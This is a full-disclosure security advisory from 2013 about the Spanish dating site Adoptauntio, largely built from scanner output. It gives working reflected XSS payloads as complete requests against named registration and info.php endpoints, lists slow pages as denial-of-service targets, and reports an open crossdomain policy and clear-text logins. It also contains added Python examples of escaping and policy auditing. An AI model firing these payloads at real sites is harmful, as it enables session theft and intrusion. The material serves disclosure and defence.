Spanish social network "Adoptauntio": XSS / Insecure crossdomain / Sensitive files Disclosure / D.O.S
Adopta un tio, advertised on TV
========================================================================================================================================
ADOPTAUNTIO SOCIAL NETWORK Xss/ Insecure crossdomain / Sensitive files Disclosure / D.O.S / User credentials are sent in clear text
========================================================================================================================================
TIME-LINE VULNERABILITY
Multiple advisories sent, but no vendor response
3/09/2013 Full Disclosure
I. VULNERABILITY
————————-
#Title: ADOPTAUNTIO SOCIAL NETWORK Cross site scripting / Insecure crossdomain.xml file / Sensitive files Disclosure / Top 10 response times Denial Of Service / User credentials are sent in clear text
#Vendor:http://www.adoptauntio.es/
#Author:Juan Carlos García (@secnight)
#Follow me
http://www.highsec.es
Twitter:@secnight
II. DESCRIPTION
————————-
It is a dating site for women that has just arrived in Spain, inspired by the idea of Adopteunmec, a successful French website.
The Adoptauntio.es concept is simple. The customer is king, and in this case, the customers are women.
Ladies first!
In the supermarket of dating, women find good bargains.
Want to meet serious women / men? Find your soul mate? Meet new people? Enlarge your circle of friends?
AdoptaUnTio meets the needs of every single person, whether you're a man looking for a woman or a woman looking for a man.
III. PROOF OF CONCEPT
———————————
WorkArounds
Knowledge Base
List of file extensions
————————
Description
File extensions can provide information on what technologies are being used on this website.
List of file extensions detected:
———————————
htm => 1 file(s)
txt => 1 file(s)
xml => 1 file(s)
gitignore => 1 file(s)
php => 2 file(s)
bak => 1 file(s)
php_bak => 1 file(s)
php_ => 1 file(s)
BAK => 1 file(s)
old => 1 file(s)
php_old => 1 file(s)
orig => 1 file(s)
bz2 => 2 file(s)
7z => 1 file(s)
temp => 1 file(s)
backup => 1 file(s)
000 => 1 file(s)
001 => 1 file(s)
php~ => 1 file(s)
php~1 => 1 file(s)
cs => 1 file(s)
vb => 1 file(s)
java => 1 file(s)
inc => 1 file(s)
0 => 1 file(s)
1 => 1 file(s)
2 => 1 file(s)
List of files with inputs
————————
Description
These files have at least one input (GET or POST).
/ – 3 inputs
/auth/login – 3 inputs
/register – 2 inputs
/register/index – 1 inputs
/register/step2 – 1 inputs
/help/lostPwd – 1 inputs
/help/contactus – 1 inputs
/index – 2 inputs
/index.php – 1 inputs
List of external hosts
————————–
Description
These hosts were linked from this website but they were not scanned because they are out of scope..
s7.adoptauntio.es
s8.adoptauntio.es
s4.adoptauntio.es
s.adoptauntio.es
www.google.com
www.mozilla.org
s3.adoptauntio.es
s1.adoptauntio.es
twitter.com
www.facebook.com
market.android.com
itunes.apple.com
files.adopteunmec.com
script.weborama.fr
download.macromedia.com
cstatic.weborama.fr
static.criteo.net
s5.adoptauntio.es
s9.adoptauntio.es
adopteunmec.solution.weborama.fr
s0.adoptauntio.es
s6.adoptauntio.es
Cross Site Scripting
*****************************
Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious
code (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be
trusted or not, it will execute the script in the user context allowing the attacker to access any cookies
or session tokens retained by the browser.
Affected items
/info.php
/info.php.BAK
/register/
/register/index
/info.php
URI was set to 1<ScRiPt>prompt(930070)</ScRiPt>
The input is reflected inside a text element.
GET /info.php/1%3CScRiPt%3Eprompt(930070)%3C/ScRiPt%3E
/info.php.BAK.
URI was set to 1<ScRiPt>prompt(981177)</ScRiPt>
The input is reflected inside a text element.
GET /info.php.BAK/1%3CScRiPt%3Eprompt(981177)%3C/ScRiPt%3E
/register/ (10)
URL encoded POST input sex was set to 1' onmouseover=prompt(901376) bad='
The input is reflected inside a tag parameter between single quotes.
POST /register/
captcha=1&city=San%20Francisco&country=es&day=01&email=sample%40email.tst&month=1&password=secnight&password_check=secnight&sex=1%27%20onmouseover%3dprompt%28901376%29%20bad%3d%27&year=1999&zipcode=94102
Variants
sex(6)
URL encoded POST input sex was set to 1' onmouseover=prompt(901376) bad='
POST /register/
captcha=1&city=San%20Francisco&country=es&day=01&email=sample%40email.tst&month=1&password=secnightx&password_check=secnight&sex=1%27%20onmouseover%3dprompt%28901376%29%20bad%3d%27&year=1999&zipcode=94102
zipcode (3)
URL encoded POST input zipcode was set to 94102" onmouseover=prompt(980712) bad="
The input is reflected inside a tag parameter between double quotes.
POST /register/
captcha=1&city=San%20Francisco&country=es&day=01&email=sample%40email.tst&month=1&password=secnight&password_check=secnight&sex=1&year=1999&zipcode=94102%22%20onmouseover%3dprompt%28980712%29%20bad%3d%22
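The scanner reports three reflection contexts (element text, a single-quoted attribute and a double-quoted attribute), and each needs output encoding for that context. The Python below is an added example, not code from the advisory or the site: a minimal registration template written both the way the scanner found it (raw concatenation, an assumed template) and with each value encoded for its context, plus a parser-based regression check confirming that the reported payloads no longer yield a new tag or an event-handler attribute.

```python
import html
from html.parser import HTMLParser

# Constructed inputs: the three reflected values the advisory reports
# (the URI, the POST parameter 'sex' and the POST parameter 'zipcode').
PATH_PAYLOAD = "1<ScRiPt>prompt(930070)</ScRiPt>"
SEX_PAYLOAD = "1' onmouseover=prompt(901376) bad='"
ZIP_PAYLOAD = '94102" onmouseover=prompt(980712) bad="'

def render_unsafe(path_info: str, sex: str, zipcode: str) -> str:
    """The pattern the scanner found: raw values pasted into an assumed template."""
    return (
        f"<p>{path_info}</p>"
        f"<input name='sex' value='{sex}'>"
        f'<input name="zipcode" value="{zipcode}">'
    )

def render_safe(path_info: str, sex: str, zipcode: str) -> str:
    """Same template, each value encoded for its context: element text gets & < >
    encoded; attributes are always double-quoted with " and ' encoded too."""
    text = html.escape(path_info, quote=False)
    sex_attr = html.escape(sex, quote=True)
    zip_attr = html.escape(zipcode, quote=True)
    return (
        f"<p>{text}</p>"
        f'<input name="sex" value="{sex_attr}">'
        f'<input name="zipcode" value="{zip_attr}">'
    )

class MarkupInventory(HTMLParser):
    """Record the tags and attribute names a browser would actually parse."""
    def __init__(self) -> None:
        super().__init__()
        self.tags: list = []
        self.attrs: list = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.attrs.extend(name for name, _ in attrs)

def injected_markup(fragment: str):
    """Return (tags the template never emits, event-handler attribute names)."""
    parser = MarkupInventory()
    parser.feed(fragment)
    parser.close()
    bad_tags = [t for t in parser.tags if t not in ("p", "input")]
    handlers = [a for a in parser.attrs if a.startswith("on")]
    return bad_tags, handlers
```

Running `injected_markup` over `render_unsafe(...)` with the three payloads lists a `script` tag and two `onmouseover` attributes; over `render_safe(...)` both lists are empty.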
Insecure crossdomain.xml file
****************************************
The browser security model normally prevents web content from one domain from accessing data from another domain.
This is commonly known as the “same origin policy”. URL policy files grant cross-domain permissions for reading data.
They permit operations that are not permitted by default. The URL policy file is located, by default, in the root directory
of the target server, with the name crossdomain.xml (for example, at www.example.com/crossdomain.xml).
Affected Items
Web Server
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
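An added example, not from the advisory or the vendor: a small audit routine that flags the wildcard rule quoted above, shown next to a policy restricted to the site's own hosts. The allowed hostnames in the restricted policy are an assumption made for illustration; the advisory does not state what the site should permit.

```python
import xml.etree.ElementTree as ET

# Constructed sample: the wildcard policy quoted in the advisory.
INSECURE_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*" />
</cross-domain-policy>"""

# Constructed sample: the same file limited to the site's own hosts
# (assumed hostnames) and to HTTPS origins only.
RESTRICTED_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only" />
  <allow-access-from domain="www.adoptauntio.es" secure="true" />
  <allow-access-from domain="*.adoptauntio.es" secure="true" />
</cross-domain-policy>"""


def audit_crossdomain(policy_xml: str) -> list:
    """Return findings for a crossdomain.xml policy.

    Flags what a scanner reports as 'insecure crossdomain.xml': a bare
    wildcard domain, a wildcard covering a whole top-level domain (e.g.
    '*.com'), rules that accept non-HTTPS origins, and a wildcard in
    allow-http-request-headers-from.
    """
    findings = []
    root = ET.fromstring(policy_xml)
    if root.tag != "cross-domain-policy":
        return ["root element is not <cross-domain-policy>"]
    for rule in root.findall("allow-access-from"):
        domain = rule.get("domain", "")
        if domain == "*":
            findings.append('allow-access-from domain="*" grants every origin')
        elif domain.startswith("*.") and domain.count(".") < 2:
            findings.append(f"wildcard {domain!r} spans an entire top-level domain")
        # Adobe's default for 'secure' is true; an explicit false downgrades it.
        if rule.get("secure", "true").lower() != "true":
            findings.append(f"rule for {domain!r} allows access from non-HTTPS origins")
    for hdr in root.findall("allow-http-request-headers-from"):
        if hdr.get("domain") == "*":
            findings.append('allow-http-request-headers-from domain="*" grants every origin')
    return findings
```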
Sensitive files Disclosure
**********************************
Sensitive file has been found. This file is not directly linked from the website.
This check looks for common sensitive resources like password files, configuration files, log files,
include files, statistics data, database dumps. Each one of these files could help an attacker to learn more about his target.
Affected items
/.gitignore
Denial Of Service (Top 10 response times)
**********************************************************
The files listed below had the slowest response times measured during the penetration test.
The average response time for this site was 723.08 ms.
These files could be targeted in denial of service attacks.
1. /register, response time 2699 ms
POST /register HTTP/1.1
Pragma: no-cache
Referer: http://www.adoptauntio.es/register/index
Accept: */*
captcha=1&city=San%20Francisco&country=es&day=03&email=sample%40email.tst&month=1&password=secnight&password_check=secnight&sex=1&year=1999&zipcode=941022.
2. /help/lostPwd, response time 859 ms
GET /help/lostPwd HTTP/1.1
Pragma: no-cache
Referer: http://www.adoptauntio.es/help
3. /help/contactus, response time 858 ms
POST /help/contactus HTTP/1.1
Pragma: no-cache
Referer: http://www.adoptauntio.es/help
Content-Length: 664
Cookie: ES_AUMSESSID21=22320b9f030ab74c17a732a4ac81989adc09fd6c; aum_login_redirect=mobile
Host: www.adoptauntio.es
Content-Disposition: form-data; name="check-captcha"
1
Content-Disposition: form-data; name="ctc-mail"
User credentials are sent in clear text
******************************************************
User credentials are transmitted over an unencrypted channel.
This information should always be transferred via an encrypted channel (HTTPS) to avoid
being intercepted by malicious users.
Affected items
/
/index (cf14b7e692972470751e96464ce41375)
/landing
/register (c638a52f774a26f6d0ba89bced166ad2)
/register/index (a419e577064dab55f72b672987594b21)
The impact of this vulnerability
A third party may be able to read the user credentials by intercepting an unencrypted HTTP connection.
How to fix this vulnerability
Because user credentials are considered sensitive information, they should always be transferred to the server
over an encrypted connection (HTTPS).
IV. BUSINESS IMPACT
————————————
In social networks, failures like these ARE VERY DANGEROUS because millions of users are exposed to attack.
V SOLUTION
————————
Very easy and I don't understand… WRITE SECURE CODE P L E A S E !!
VI. CREDITS
————————-
This vulnerability has been discovered
by Juan Carlos García(@secnight)
VII. LEGAL NOTICES
————————-
The Author accepts no responsibility for any damage
caused by the use or misuse of this information.
If you are being adopted on this social network, you already know what you have to do…. watch out for the bearded ones!!
Likewise, I hope this is useful to people who are curious about the "how" and the "form" of a web application security advisory, since you now have a valid example of one. Everyone can do it as they like, but, more or less, keep in mind the points that are marked, because it is always good to give all the information possible, or whatever you consider appropriate.
Regards
Juan Carlos García
Live Free Or Die Hacking